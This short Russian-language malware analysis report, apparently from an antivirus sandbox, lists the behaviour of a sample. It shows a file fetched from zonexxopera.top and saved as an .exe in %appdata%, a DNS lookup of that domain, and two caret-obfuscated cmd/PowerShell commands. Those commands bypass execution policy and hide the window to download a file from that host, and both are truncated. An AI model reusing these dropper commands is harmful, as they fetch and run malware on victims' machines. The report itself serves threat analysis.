Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWeR^she^ll^.Ex^e -Exe^C^utiO^Npol^icy^ byp^aSS -^nO^pR^oFil^E -w^in^DOwstY^l^e^ hidD^e^N (^new-obj^EC^t sysTEM^.n^e^T^.^wEbCL^iE^NT).DOWNloa^d^f^ILe('http://zonexxopera.top/...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "POWeR^she^ll^.Ex^e -Exe^C^utiO^Npol^icy^ byp^aSS -^nO^pR^oFil^E -w^in^DOwstY^l^e^ hidD^e^N (^new-obj^EC^t sysTEM^.n^e^T^.^wEbCL^iE^NT).DOWNloa^d^f^ILe('http://zonexxopera.top/...' (со скрытым окном)